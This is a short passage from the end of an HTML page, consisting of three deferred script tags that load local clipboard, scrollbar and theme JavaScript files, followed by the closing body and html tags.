    <script src="/js/clipboard/clipboard.min.js?1765213734" defer></script>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1765213734" defer></script>
    <script src="/js/theme.js?1765213734" defer></script>
  </body>
</html>
